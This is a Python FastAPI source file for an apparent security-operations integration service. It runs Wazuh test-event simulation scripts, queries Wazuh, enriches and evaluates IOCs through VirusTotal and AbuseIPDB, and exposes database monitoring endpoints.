# shell script filename; _build_sim_command resolves it under SIM_SCRIPTS_DIR.
SIM_SCRIPT_MAP: dict[str, str] = {
    "fortigate": "send-wazuh-fortigate-test-events.sh",
    "endpoint": "send-wazuh-endpoint-agent-test-events.sh",
    "cisco": "send-wazuh-cisco-test-events.sh",
    "proposal_required": "send-wazuh-proposal-required-events.sh",
    "proposal_appendix_b": "send-wazuh-proposal-appendix-b-events.sh",
    "proposal_appendix_c": "send-wazuh-proposal-appendix-c-events.sh",
    "wazuh_test": "send-wazuh-test-events.sh",
}
  832. def _build_sim_command(payload: SimLogRunRequest) -> list[str]:
  833. script_name = SIM_SCRIPT_MAP[payload.script]
  834. script_path = SIM_SCRIPTS_DIR / script_name
  835. count = max(1, int(payload.count))
  836. delay = max(0.0, float(payload.delay_seconds))
  837. if payload.script == "endpoint":
  838. cmd = [
  839. "/bin/bash",
  840. str(script_path),
  841. payload.target or "all",
  842. payload.scenario or "all",
  843. str(count),
  844. str(delay),
  845. ]
  846. else:
  847. cmd = [
  848. "/bin/bash",
  849. str(script_path),
  850. payload.target or "all",
  851. str(count),
  852. str(delay),
  853. ]
  854. if payload.forever:
  855. cmd.append("--forever")
  856. return cmd
  857. def _serialize_sim_run(run_id: str, run: dict[str, object]) -> dict[str, object]:
  858. process = run.get("process")
  859. poll_code = process.poll() if process else None
  860. return_code = run.get("return_code")
  861. if poll_code is not None and return_code is None:
  862. run["return_code"] = poll_code
  863. return_code = poll_code
  864. return {
  865. "run_id": run_id,
  866. "script": run.get("script"),
  867. "target": run.get("target"),
  868. "scenario": run.get("scenario"),
  869. "count": run.get("count"),
  870. "delay_seconds": run.get("delay_seconds"),
  871. "forever": run.get("forever"),
  872. "pid": run.get("pid"),
  873. "cmd": run.get("cmd"),
  874. "started_at": run.get("started_at"),
  875. "stopped_at": run.get("stopped_at"),
  876. "running": bool(process and process.poll() is None),
  877. "return_code": return_code,
  878. "log_file": run.get("log_file"),
  879. }
  880. def _tail_log_lines(path: Path, limit: int = 200) -> list[str]:
  881. line_limit = max(1, min(int(limit), 1000))
  882. lines: deque[str] = deque(maxlen=line_limit)
  883. try:
  884. with path.open("r", encoding="utf-8", errors="replace") as handle:
  885. for line in handle:
  886. lines.append(line.rstrip("\n"))
  887. except FileNotFoundError:
  888. return []
  889. return list(lines)
  890. def _safe_query_token(value: object) -> str | None:
  891. text = str(value or "").strip()
  892. if not text:
  893. return None
  894. if not re.fullmatch(r"[A-Za-z0-9_.:-]+", text):
  895. return None
  896. return text
  897. def _parse_iso_datetime(value: object) -> datetime | None:
  898. text = str(value or "").strip()
  899. if not text:
  900. return None
  901. if text.endswith("Z"):
  902. text = text[:-1] + "+00:00"
  903. try:
  904. parsed = datetime.fromisoformat(text)
  905. except ValueError:
  906. return None
  907. if parsed.tzinfo is None:
  908. parsed = parsed.replace(tzinfo=timezone.utc)
  909. return parsed.astimezone(timezone.utc)
def _sim_wazuh_query_clauses(run: dict[str, object]) -> list[str]:
    """Build query-string clauses matching events emitted by a simulation run.

    Every query is anchored on the soc_mvp_test marker; script- and
    target-specific clauses are appended on top. The target value is
    sanitized by _safe_query_token before being interpolated.
    """
    script = str(run.get("script") or "").strip().lower()
    target = str(run.get("target") or "all").strip()
    scenario = str(run.get("scenario") or "all").strip().lower()
    target_token = _safe_query_token(target)
    # scenario is read but not used for filtering yet; discarded explicitly.
    _ = scenario
    clauses: list[str] = ["(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)"]
    if script == "fortigate":
        clauses.append(
            "(full_log:*fortigate* OR full_log:*FGT80F* OR full_log:*FGT60F* OR full_log:*FGT40F* "
            "OR full_log:*FGT501E* OR data.vendor:fortinet OR data.product:fortigate OR data.source:fortigate)"
        )
        if target_token and target_token.lower() != "all":
            clauses.append(f"(full_log:*{target_token}* OR data.model:{target_token})")
    elif script == "endpoint":
        if target_token and target_token.lower() != "all":
            lowered = target_token.lower()
            if lowered in {"windows", "win"}:
                clauses.append(
                    "(full_log:*source=windows* OR full_log:*source=windows_agent* "
                    "OR data.source:windows OR data.source:windows_agent OR data.platform:windows)"
                )
            elif lowered in {"mac", "macos"}:
                clauses.append(
                    "(full_log:*source=mac* OR full_log:*source=mac_agent* "
                    "OR data.source:mac OR data.source:mac_agent OR data.platform:mac)"
                )
            elif lowered == "linux":
                clauses.append(
                    "(full_log:*source=linux* OR full_log:*source=linux_agent* "
                    "OR data.source:linux OR data.source:linux_agent OR data.platform:linux)"
                )
            else:
                # Unknown endpoint target: fall back to a raw substring match.
                clauses.append(f"full_log:*{target_token}*")
        else:
            # No specific target: match any of the three endpoint platforms.
            clauses.append(
                "(full_log:*source=windows* OR full_log:*source=windows_agent* "
                "OR full_log:*source=mac* OR full_log:*source=mac_agent* "
                "OR full_log:*source=linux* OR full_log:*source=linux_agent* "
                "OR data.source:windows OR data.source:windows_agent "
                "OR data.source:mac OR data.source:mac_agent "
                "OR data.source:linux OR data.source:linux_agent)"
            )
    elif script == "cisco":
        clauses.append("(full_log:*cisco* OR data.vendor:cisco)")
        if target_token and target_token.lower() != "all":
            clauses.append(f"full_log:*{target_token}*")
    elif script in {"proposal_required", "proposal_appendix_b", "proposal_appendix_c", "wazuh_test"}:
        clauses.append("(full_log:*soc_mvp_test=true* OR data.soc_mvp_test:true)")
        if target_token and target_token.lower() != "all":
            clauses.append(f"full_log:*{target_token}*")
    else:
        # Unknown script name: keep only the generic test-event marker.
        clauses.append("full_log:*soc_mvp_test=true*")
    return clauses
  964. def _extract_wazuh_hits(payload: object) -> list[dict[str, object]]:
  965. if not isinstance(payload, dict):
  966. return []
  967. hits_root = payload.get("hits")
  968. if not isinstance(hits_root, dict):
  969. return []
  970. hits = hits_root.get("hits")
  971. if not isinstance(hits, list):
  972. return []
  973. result: list[dict[str, object]] = []
  974. for hit in hits:
  975. if isinstance(hit, dict):
  976. result.append(hit)
  977. return result
  978. def _extract_wazuh_event_item(hit: dict[str, object], include_raw: bool) -> dict[str, object]:
  979. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  980. source = source if isinstance(source, dict) else {}
  981. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  982. agent = agent if isinstance(agent, dict) else {}
  983. decoder = source.get("decoder") if isinstance(source.get("decoder"), dict) else {}
  984. decoder = decoder if isinstance(decoder, dict) else {}
  985. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  986. data = data if isinstance(data, dict) else {}
  987. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  988. rule = rule if isinstance(rule, dict) else {}
  989. item: dict[str, object] = {
  990. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  991. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  992. "agent_name": agent.get("name"),
  993. "agent_id": agent.get("id"),
  994. "decoder_name": decoder.get("name"),
  995. "source": data.get("source"),
  996. "event_type": data.get("event_type"),
  997. "severity": data.get("severity"),
  998. "rule_id": rule.get("id"),
  999. "rule_description": rule.get("description"),
  1000. "full_log": source.get("full_log"),
  1001. }
  1002. if include_raw:
  1003. item["raw"] = source
  1004. return item
  1005. def _extract_wazuh_rule_item(hit: dict[str, object], include_raw: bool) -> dict[str, object] | None:
  1006. source = hit.get("_source") if isinstance(hit.get("_source"), dict) else {}
  1007. source = source if isinstance(source, dict) else {}
  1008. rule = source.get("rule") if isinstance(source.get("rule"), dict) else {}
  1009. rule = rule if isinstance(rule, dict) else {}
  1010. rule_id = rule.get("id")
  1011. if rule_id in {None, ""}:
  1012. return None
  1013. agent = source.get("agent") if isinstance(source.get("agent"), dict) else {}
  1014. agent = agent if isinstance(agent, dict) else {}
  1015. data = source.get("data") if isinstance(source.get("data"), dict) else {}
  1016. data = data if isinstance(data, dict) else {}
  1017. item: dict[str, object] = {
  1018. "@timestamp": source.get("@timestamp") or source.get("timestamp"),
  1019. "rule_id": rule_id,
  1020. "rule_level": rule.get("level"),
  1021. "rule_description": rule.get("description"),
  1022. "rule_firedtimes": rule.get("firedtimes"),
  1023. "event_id": data.get("event_id") or source.get("id") or hit.get("_id"),
  1024. "agent_name": agent.get("name"),
  1025. "full_log": source.get("full_log"),
  1026. }
  1027. if include_raw:
  1028. item["raw"] = source
  1029. return item
  1030. @app.post(
  1031. "/ioc/enrich",
  1032. response_model=ApiResponse,
  1033. summary="IOC enrich",
  1034. description="Fetch enrichment data for IOC from selected providers without final verdict scoring.",
  1035. )
  1036. async def ioc_enrich(payload: IocEnrichRequest) -> ApiResponse:
  1037. providers = [p.lower().strip() for p in payload.providers]
  1038. result: dict[str, object] = {
  1039. "ioc_type": payload.ioc_type,
  1040. "ioc_value": payload.ioc_value,
  1041. "providers_requested": providers,
  1042. "providers": {},
  1043. }
  1044. if "virustotal" in providers:
  1045. try:
  1046. vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
  1047. result["providers"] = {**(result.get("providers") or {}), "virustotal": vt}
  1048. except Exception as exc:
  1049. repo.add_ioc_trace(
  1050. action="enrich",
  1051. ioc_type=payload.ioc_type,
  1052. ioc_value=payload.ioc_value,
  1053. providers=providers,
  1054. request_payload=payload.model_dump(mode="json"),
  1055. response_payload={},
  1056. error=str(exc),
  1057. )
  1058. raise HTTPException(status_code=502, detail=f"VirusTotal call failed: {exc}") from exc
  1059. if "abuseipdb" in providers:
  1060. if payload.ioc_type != "ip":
  1061. result["providers"] = {
  1062. **(result.get("providers") or {}),
  1063. "abuseipdb": {"skipped": "AbuseIPDB currently supports ioc_type='ip' only"},
  1064. }
  1065. else:
  1066. try:
  1067. abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
  1068. result["providers"] = {**(result.get("providers") or {}), "abuseipdb": abuse}
  1069. except Exception as exc:
  1070. repo.add_ioc_trace(
  1071. action="enrich",
  1072. ioc_type=payload.ioc_type,
  1073. ioc_value=payload.ioc_value,
  1074. providers=providers,
  1075. request_payload=payload.model_dump(mode="json"),
  1076. response_payload={},
  1077. error=str(exc),
  1078. )
  1079. raise HTTPException(status_code=502, detail=f"AbuseIPDB call failed: {exc}") from exc
  1080. repo.add_ioc_trace(
  1081. action="enrich",
  1082. ioc_type=payload.ioc_type,
  1083. ioc_value=payload.ioc_value,
  1084. providers=providers,
  1085. request_payload=payload.model_dump(mode="json"),
  1086. response_payload=result,
  1087. )
  1088. return ApiResponse(data={"ioc": result})
@app.post(
    "/ioc/evaluate",
    response_model=ApiResponse,
    summary="IOC evaluate",
    description="Evaluate IOC against selected intelligence providers and return matched/severity/confidence.",
)
async def ioc_evaluate(payload: IocEvaluateRequest) -> ApiResponse:
    """Evaluate an IOC with VirusTotal and/or AbuseIPDB and aggregate a verdict.

    Raises 400 when no supported provider was requested and 502 when every
    requested provider failed. Partial failures do not fail the request;
    they are folded into the aggregated reason string instead.
    """
    providers = [p.lower().strip() for p in payload.providers]
    supported = {"virustotal", "abuseipdb"}
    requested = [p for p in providers if p in supported]
    if not requested:
        raise HTTPException(status_code=400, detail="No supported provider requested. Use ['virustotal'] or ['abuseipdb'].")
    per_provider: dict[str, dict[str, object]] = {}
    errors: dict[str, str] = {}
    if "virustotal" in requested:
        try:
            vt = await virustotal_adapter.enrich_ioc(payload.ioc_type, payload.ioc_value)
            vt_result, _, _, _ = _build_vt_ioc_result(
                vt=vt,
                ioc_type=payload.ioc_type,
                ioc_value=payload.ioc_value,
                malicious_threshold=payload.malicious_threshold,
                suspicious_threshold=payload.suspicious_threshold,
            )
            per_provider["virustotal"] = vt_result
        except Exception as exc:
            # Collected rather than raised: the other provider may still succeed.
            errors["virustotal"] = str(exc)
    if "abuseipdb" in requested:
        if payload.ioc_type != "ip":
            errors["abuseipdb"] = "AbuseIPDB supports ioc_type='ip' only"
        else:
            try:
                abuse = await abuseipdb_adapter.check_ip(payload.ioc_value)
                abuse_result, _, _, _ = _build_abuseipdb_ioc_result(
                    abuse=abuse,
                    ioc_value=payload.ioc_value,
                    confidence_threshold=50,
                )
                per_provider["abuseipdb"] = abuse_result
            except Exception as exc:
                errors["abuseipdb"] = str(exc)
    if not per_provider:
        # Every requested provider failed: record the trace, then surface 502.
        repo.add_ioc_trace(
            action="evaluate",
            ioc_type=payload.ioc_type,
            ioc_value=payload.ioc_value,
            providers=requested,
            request_payload=payload.model_dump(mode="json"),
            response_payload={},
            error=str(errors),
        )
        raise HTTPException(status_code=502, detail=f"Provider evaluation failed: {errors}")
    # aggregate decision (max confidence/severity, matched if any provider matched)
    order = {"low": 1, "medium": 2, "high": 3, "critical": 4}
    matched = any(bool(r.get("matched")) for r in per_provider.values())
    confidence = max(float(r.get("confidence", 0.0) or 0.0) for r in per_provider.values())
    severity = max((str(r.get("severity", "low")) for r in per_provider.values()), key=lambda x: order.get(x, 1))
    reason_parts = [f"{name}:{res.get('reason','')}" for name, res in per_provider.items()]
    if errors:
        reason_parts.append(f"errors={errors}")
    ioc_result = {
        "ioc_type": payload.ioc_type,
        "ioc_value": payload.ioc_value,
        "matched": matched,
        "severity": severity,
        "confidence": round(confidence, 4),
        "reason": " | ".join(reason_parts),
        "providers": per_provider,
    }
    repo.add_ioc_trace(
        action="evaluate",
        ioc_type=payload.ioc_type,
        ioc_value=payload.ioc_value,
        providers=providers,
        request_payload=payload.model_dump(mode="json"),
        response_payload=ioc_result,
        matched=matched,
        severity=severity,
        confidence=float(ioc_result["confidence"]),
    )
    return ApiResponse(data={"ioc": ioc_result})
  1170. @app.post(
  1171. "/ioc/upload-file",
  1172. response_model=ApiResponse,
  1173. summary="Upload file to VirusTotal",
  1174. description="Upload a file sample to VirusTotal and return upload/analysis identifiers.",
  1175. )
  1176. async def ioc_upload_file(file: UploadFile = File(...)) -> ApiResponse:
  1177. content = await file.read()
  1178. if not content:
  1179. raise HTTPException(status_code=400, detail="Uploaded file is empty")
  1180. try:
  1181. vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
  1182. except Exception as exc:
  1183. repo.add_ioc_trace(
  1184. action="upload_file",
  1185. ioc_type="hash",
  1186. ioc_value=file.filename or "<unknown>",
  1187. providers=["virustotal"],
  1188. request_payload={"filename": file.filename, "size": len(content)},
  1189. response_payload={},
  1190. error=str(exc),
  1191. )
  1192. raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
  1193. repo.add_ioc_trace(
  1194. action="upload_file",
  1195. ioc_type="hash",
  1196. ioc_value=file.filename or "<unknown>",
  1197. providers=["virustotal"],
  1198. request_payload={"filename": file.filename, "size": len(content)},
  1199. response_payload=vt_upload if isinstance(vt_upload, dict) else {"raw": str(vt_upload)},
  1200. )
  1201. return ApiResponse(data={"virustotal": vt_upload})
  1202. @app.get(
  1203. "/ioc/analysis/{analysis_id}",
  1204. response_model=ApiResponse,
  1205. summary="Get VirusTotal analysis",
  1206. description="Fetch analysis status/details from VirusTotal by analysis ID.",
  1207. )
  1208. async def ioc_get_analysis(analysis_id: str) -> ApiResponse:
  1209. try:
  1210. vt_analysis = await virustotal_adapter.get_analysis(analysis_id)
  1211. except Exception as exc:
  1212. repo.add_ioc_trace(
  1213. action="analysis",
  1214. ioc_type="hash",
  1215. ioc_value=analysis_id,
  1216. providers=["virustotal"],
  1217. request_payload={"analysis_id": analysis_id},
  1218. response_payload={},
  1219. error=str(exc),
  1220. )
  1221. raise HTTPException(status_code=502, detail=f"VirusTotal analysis fetch failed: {exc}") from exc
  1222. repo.add_ioc_trace(
  1223. action="analysis",
  1224. ioc_type="hash",
  1225. ioc_value=analysis_id,
  1226. providers=["virustotal"],
  1227. request_payload={"analysis_id": analysis_id},
  1228. response_payload=vt_analysis if isinstance(vt_analysis, dict) else {"raw": str(vt_analysis)},
  1229. )
  1230. return ApiResponse(data={"virustotal": vt_analysis})
@app.post(
    "/ioc/evaluate-file",
    response_model=ApiResponse,
    summary="Evaluate uploaded file IOC",
    description="Upload a file, poll analysis completion, fetch final file report, and return IOC verdict.",
)
async def ioc_evaluate_file(
    file: UploadFile = File(...),
    malicious_threshold: int = 1,
    suspicious_threshold: int = 3,
    poll_timeout_seconds: int = 30,
    poll_interval_seconds: int = 2,
) -> ApiResponse:
    """Upload a sample to VirusTotal, wait for analysis, and return a verdict.

    Flow: upload -> poll the analysis until status == "completed" (bounded by
    poll_timeout_seconds) -> fetch the file report by sha256 -> build the IOC
    verdict with _build_vt_ioc_result. Each failure path is traced through
    repo.add_ioc_trace and surfaced as HTTP 502.
    """
    content = await file.read()
    if not content:
        raise HTTPException(status_code=400, detail="Uploaded file is empty")
    try:
        vt_upload = await virustotal_adapter.upload_file(file.filename or "upload.bin", content)
    except Exception as exc:
        repo.add_ioc_trace(
            action="evaluate_file",
            ioc_type="hash",
            ioc_value=file.filename or "<unknown>",
            providers=["virustotal"],
            request_payload={"filename": file.filename, "size": len(content)},
            response_payload={},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal upload failed: {exc}") from exc
    # The upload response carries the analysis identifier under data.id.
    analysis_id = (
        (((vt_upload.get("data") or {}).get("id")) if isinstance(vt_upload, dict) else None)
        or ""
    )
    if not analysis_id:
        raise HTTPException(status_code=502, detail="VirusTotal upload response missing analysis ID")
    timeout = max(1, poll_timeout_seconds)
    interval = max(1, poll_interval_seconds)
    elapsed = 0
    analysis: dict[str, object] = {}
    # Poll until the analysis reports completion or the timeout budget is spent.
    while elapsed <= timeout:
        analysis = await virustotal_adapter.get_analysis(analysis_id)
        status = (
            (((analysis.get("data") or {}).get("attributes") or {}).get("status"))
            if isinstance(analysis, dict)
            else None
        )
        if status == "completed":
            break
        await asyncio.sleep(interval)
        elapsed += interval
    # The file hash is reported in meta.file_info.sha256 of the analysis response.
    sha256 = (
        (((analysis.get("meta") or {}).get("file_info") or {}).get("sha256"))
        if isinstance(analysis, dict)
        else None
    )
    if not sha256:
        raise HTTPException(status_code=502, detail="VirusTotal analysis did not return file hash yet")
    try:
        vt_file = await virustotal_adapter.enrich_ioc("hash", str(sha256))
    except Exception as exc:
        repo.add_ioc_trace(
            action="evaluate_file",
            ioc_type="hash",
            ioc_value=str(sha256),
            providers=["virustotal"],
            request_payload={"filename": file.filename, "analysis_id": analysis_id},
            response_payload={"upload": vt_upload, "analysis": analysis},
            error=str(exc),
        )
        raise HTTPException(status_code=502, detail=f"VirusTotal report fetch failed: {exc}") from exc
    ioc_result, matched, severity, confidence = _build_vt_ioc_result(
        vt=vt_file,
        ioc_type="hash",
        ioc_value=str(sha256),
        malicious_threshold=malicious_threshold,
        suspicious_threshold=suspicious_threshold,
    )
    ioc_result["analysis_id"] = analysis_id
    ioc_result["filename"] = file.filename
    repo.add_ioc_trace(
        action="evaluate_file",
        ioc_type="hash",
        ioc_value=str(sha256),
        providers=["virustotal"],
        request_payload={"filename": file.filename, "analysis_id": analysis_id},
        response_payload={
            "upload": vt_upload,
            "analysis": analysis,
            "ioc": ioc_result,
        },
        matched=matched,
        severity=severity,
        confidence=confidence,
    )
    return ApiResponse(data={"ioc": ioc_result, "analysis": analysis, "upload": vt_upload})
  1326. @app.get(
  1327. "/ioc/history",
  1328. response_model=ApiResponse,
  1329. summary="IOC trace history",
  1330. description="List recent IOC enrichment/evaluation trace records stored in database.",
  1331. )
  1332. async def ioc_history(limit: int = 50, offset: int = 0) -> ApiResponse:
  1333. return ApiResponse(data={"items": repo.list_ioc_trace(limit=limit, offset=offset)})
  1334. @app.get(
  1335. "/geoip/{ip}",
  1336. response_model=ApiResponse,
  1337. summary="GeoIP lookup",
  1338. description="Lookup geolocation for a public IP address using configured GeoIP provider.",
  1339. )
  1340. async def geoip_lookup(ip: str) -> ApiResponse:
  1341. result = await geoip_adapter.lookup(ip)
  1342. return ApiResponse(data={"geoip": result})
  1343. @app.get(
  1344. "/sync/wazuh-version",
  1345. response_model=ApiResponse,
  1346. summary="Wazuh version",
  1347. description="Get Wazuh API/manager version information through adapter.",
  1348. )
  1349. async def sync_wazuh_version() -> ApiResponse:
  1350. try:
  1351. wazuh_result = await wazuh_adapter.get_version()
  1352. except Exception as exc:
  1353. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1354. return ApiResponse(data={"wazuh": wazuh_result})
  1355. @app.get(
  1356. "/wazuh/auth-test",
  1357. response_model=ApiResponse,
  1358. summary="Wazuh auth test",
  1359. description="Validate Wazuh API authentication using configured credentials.",
  1360. )
  1361. async def wazuh_auth_test() -> ApiResponse:
  1362. try:
  1363. result = await wazuh_adapter.auth_test()
  1364. except Exception as exc:
  1365. raise HTTPException(status_code=502, detail=f"Wazuh auth failed: {exc}") from exc
  1366. return ApiResponse(data={"wazuh": result})
  1367. @app.get(
  1368. "/wazuh/manager-info",
  1369. response_model=ApiResponse,
  1370. summary="Wazuh manager info",
  1371. description="Return manager information from Wazuh API.",
  1372. )
  1373. async def wazuh_manager_info() -> ApiResponse:
  1374. try:
  1375. result = await wazuh_adapter.get_manager_info()
  1376. except Exception as exc:
  1377. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1378. return ApiResponse(data={"wazuh": result})
  1379. @app.get(
  1380. "/wazuh/agents",
  1381. response_model=ApiResponse,
  1382. summary="List Wazuh agents",
  1383. description="List registered Wazuh agents with pagination and optional field selection.",
  1384. )
  1385. async def wazuh_agents(
  1386. limit: int = 50,
  1387. offset: int = 0,
  1388. select: str | None = None,
  1389. ) -> ApiResponse:
  1390. try:
  1391. result = await wazuh_adapter.list_agents(limit=limit, offset=offset, select=select)
  1392. except Exception as exc:
  1393. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1394. return ApiResponse(data={"wazuh": result})
  1395. @app.get(
  1396. "/wazuh/alerts",
  1397. response_model=ApiResponse,
  1398. summary="List Wazuh alerts",
  1399. description="List alert-like entries from manager logs API for current Wazuh build.",
  1400. )
  1401. async def wazuh_alerts(
  1402. limit: int = 50,
  1403. offset: int = 0,
  1404. q: str | None = None,
  1405. sort: str | None = None,
  1406. ) -> ApiResponse:
  1407. try:
  1408. # In this Wazuh build, API alerts are exposed via manager logs.
  1409. result = await wazuh_adapter.list_manager_logs(
  1410. limit=limit, offset=offset, q=q, sort=sort
  1411. )
  1412. except Exception as exc:
  1413. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1414. return ApiResponse(data={"wazuh": result})
  1415. @app.get(
  1416. "/wazuh/manager-logs",
  1417. response_model=ApiResponse,
  1418. summary="List Wazuh manager logs",
  1419. description="Query manager logs endpoint with pagination and optional q/sort filters.",
  1420. )
  1421. async def wazuh_manager_logs(
  1422. limit: int = 50,
  1423. offset: int = 0,
  1424. q: str | None = None,
  1425. sort: str | None = None,
  1426. ) -> ApiResponse:
  1427. try:
  1428. result = await wazuh_adapter.list_manager_logs(
  1429. limit=limit, offset=offset, q=q, sort=sort
  1430. )
  1431. except Exception as exc:
  1432. raise HTTPException(status_code=502, detail=f"Wazuh call failed: {exc}") from exc
  1433. return ApiResponse(data={"wazuh": result})
  1434. @app.post(
  1435. "/wazuh/sync-to-mvp",
  1436. response_model=ApiResponse,
  1437. dependencies=[Depends(require_internal_api_key)],
  1438. summary="Sync Wazuh to MVP",
  1439. description="Fetch Wazuh alerts from indexer and pass them through MVP ingest/evaluation logic.",
  1440. )
  1441. async def wazuh_sync_to_mvp(
  1442. limit: int = 50,
  1443. minutes: int = 120,
  1444. q: str = "soc_mvp_test=true OR event_type:*",
  1445. ) -> ApiResponse:
  1446. try:
  1447. result = await mvp_service.sync_wazuh_alerts(query=q, limit=limit, minutes=minutes)
  1448. except Exception as exc:
  1449. raise HTTPException(status_code=502, detail=f"Wazuh sync failed: {exc}") from exc
  1450. return ApiResponse(data={"sync": result})
  1451. @app.get(
  1452. "/wazuh/auto-sync/status",
  1453. response_model=ApiResponse,
  1454. summary="Wazuh auto-sync status",
  1455. description="Show auto-sync enablement, settings, task runtime state, and last sync result.",
  1456. )
  1457. async def wazuh_auto_sync_status() -> ApiResponse:
  1458. state = getattr(app.state, "wazuh_auto_sync_state", {})
  1459. task = getattr(app.state, "wazuh_auto_sync_task", None)
  1460. return ApiResponse(
  1461. data={
  1462. "enabled": settings.wazuh_auto_sync_enabled,
  1463. "task_running": bool(task and not task.done()),
  1464. "settings": {
  1465. "interval_seconds": settings.wazuh_auto_sync_interval_seconds,
  1466. "limit": settings.wazuh_auto_sync_limit,
  1467. "minutes": settings.wazuh_auto_sync_minutes,
  1468. "query": settings.wazuh_auto_sync_query,
  1469. },
  1470. "state": state,
  1471. }
  1472. )
@app.get(
    "/monitor/db/tables",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="List database tables",
    description="List soc-integrator PostgreSQL tables with row count and relation size.",
)
async def monitor_db_tables() -> ApiResponse:
    """Enumerate public-schema tables with exact row counts and relation sizes.

    Reads pg_tables joined to pg_stat_user_tables for the planner's live-tuple
    estimate and the pretty-printed total relation size, then issues one
    COUNT(*) per table for an exact count.

    NOTE(review): the per-table COUNT(*) is a full scan — this endpoint can be
    slow on databases with large tables.
    """
    rows: list[dict[str, object]] = []
    with get_conn() as conn, conn.cursor() as cur:
        cur.execute(
            """
            SELECT
                t.schemaname,
                t.tablename,
                COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
                COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
                COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
            FROM pg_tables t
            LEFT JOIN pg_stat_user_tables s
                ON s.schemaname = t.schemaname
                AND s.relname = t.tablename
            WHERE t.schemaname = 'public'
            ORDER BY t.tablename
            """
        )
        tables = cur.fetchall()
        for item in tables:
            schema = str(item.get("schemaname") or "public")
            table = str(item.get("tablename") or "")
            if not table:
                continue
            # Dynamic identifiers go through sql.Identifier, so the table name
            # cannot inject SQL.
            cur.execute(
                sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
                    sql.Identifier(schema),
                    sql.Identifier(table),
                )
            )
            count_row = cur.fetchone() or {}
            row_count = int(count_row.get("cnt", 0) or 0)
            rows.append(
                {
                    "schema": schema,
                    "table": table,
                    "row_count": row_count,
                    "estimated_rows": int(item.get("estimated_rows", 0) or 0),
                    "size_bytes": int(item.get("size_bytes", 0) or 0),
                    "size_pretty": str(item.get("size_pretty") or "0 bytes"),
                }
            )
    return ApiResponse(
        data={
            "database": settings.soc_integrator_db_name,
            "generated_at": datetime.now(timezone.utc).isoformat(),
            "tables": rows,
        }
    )
@app.get(
    "/monitor/db/tables/{table_name}/rows",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="List rows from selected table",
    description="Return rows from a selected public table with pagination.",
)
async def monitor_db_table_rows(
    table_name: str,
    limit: int = 50,
    offset: int = 0,
) -> ApiResponse:
    """Page through rows of a public-schema table.

    The table name is first checked against pg_tables and then interpolated
    only via psycopg sql.Identifier, so arbitrary SQL cannot be injected.
    Rows are ordered by the first column descending — presumably newest-first
    for tables whose first column is a serial id; TODO confirm for all tables.

    Raises:
        HTTPException: 400 for an empty name, 404 when the table does not exist.
    """
    table = str(table_name or "").strip()
    if not table:
        raise HTTPException(status_code=400, detail="table_name is required")
    # Clamp paging to sane bounds: 1..500 rows per page, non-negative offset.
    page_limit = max(1, min(int(limit), 500))
    page_offset = max(0, int(offset))
    with get_conn() as conn, conn.cursor() as cur:
        # Existence check doubles as the injection guard for the path value.
        cur.execute(
            """
            SELECT 1
            FROM pg_tables
            WHERE schemaname = 'public' AND tablename = %s
            LIMIT 1
            """,
            (table,),
        )
        if not cur.fetchone():
            raise HTTPException(status_code=404, detail=f"table '{table}' not found in schema public")
        cur.execute(
            sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
                sql.Identifier("public"),
                sql.Identifier(table),
            )
        )
        total_row = cur.fetchone() or {}
        total = int(total_row.get("cnt", 0) or 0)
        cur.execute(
            sql.SQL("SELECT * FROM {}.{} ORDER BY 1 DESC LIMIT %s OFFSET %s").format(
                sql.Identifier("public"),
                sql.Identifier(table),
            ),
            (page_limit, page_offset),
        )
        rows = [dict(item) for item in (cur.fetchall() or [])]
    return ApiResponse(
        data={
            "table": table,
            "limit": page_limit,
            "offset": page_offset,
            "total": total,
            "rows": rows,
        }
    )
@app.get(
    "/monitor/systems",
    response_model=ApiResponse,
    dependencies=[Depends(require_internal_api_key)],
    summary="Systems monitor overview",
    description="Unified monitoring snapshot for Wazuh, Shuffle, IRIS, and PagerDuty with pipeline KPIs and recent records.",
)
async def monitor_systems(
    minutes: int = 60,
    limit: int = 20,
    include_raw: bool = False,
) -> ApiResponse:
    """Build a unified monitoring snapshot across Wazuh, Shuffle, IRIS, PagerDuty.

    KPI counters come from persisted DB records in the lookback window;
    per-system "recent" rows are fetched best-effort — a fetch failure degrades
    that system's card instead of failing the whole request. Per-system
    last-ok timestamps are kept across requests in
    ``app.state.systems_monitor_state``.

    Args:
        minutes: lookback window for KPI counters (clamped to >= 1).
        limit: max recent rows per system card (clamped to >= 1).
        include_raw: attach the raw dependency-health details to each card.
    """
    window_minutes = max(1, minutes)
    row_limit = max(1, limit)
    now = datetime.now(timezone.utc)
    since = now - timedelta(minutes=window_minutes)
    now_iso = now.isoformat()
    dependencies = await mvp_service.dependency_health()
    # Cross-request state; setdefault keeps an existing last_ok_at map intact.
    monitor_state = getattr(app.state, "systems_monitor_state", {"last_ok_at": {}})
    last_ok_at_by_key = monitor_state.setdefault("last_ok_at", {})
    # KPI counters from persisted database records in the selected lookback window.
    alerts_ingested = repo.count_incident_events_since(since=since, source="wazuh")
    detections_matched = repo.count_c_detection_events_since(since=since)
    iris_tickets_created = repo.count_incidents_with_iris_since(since=since)
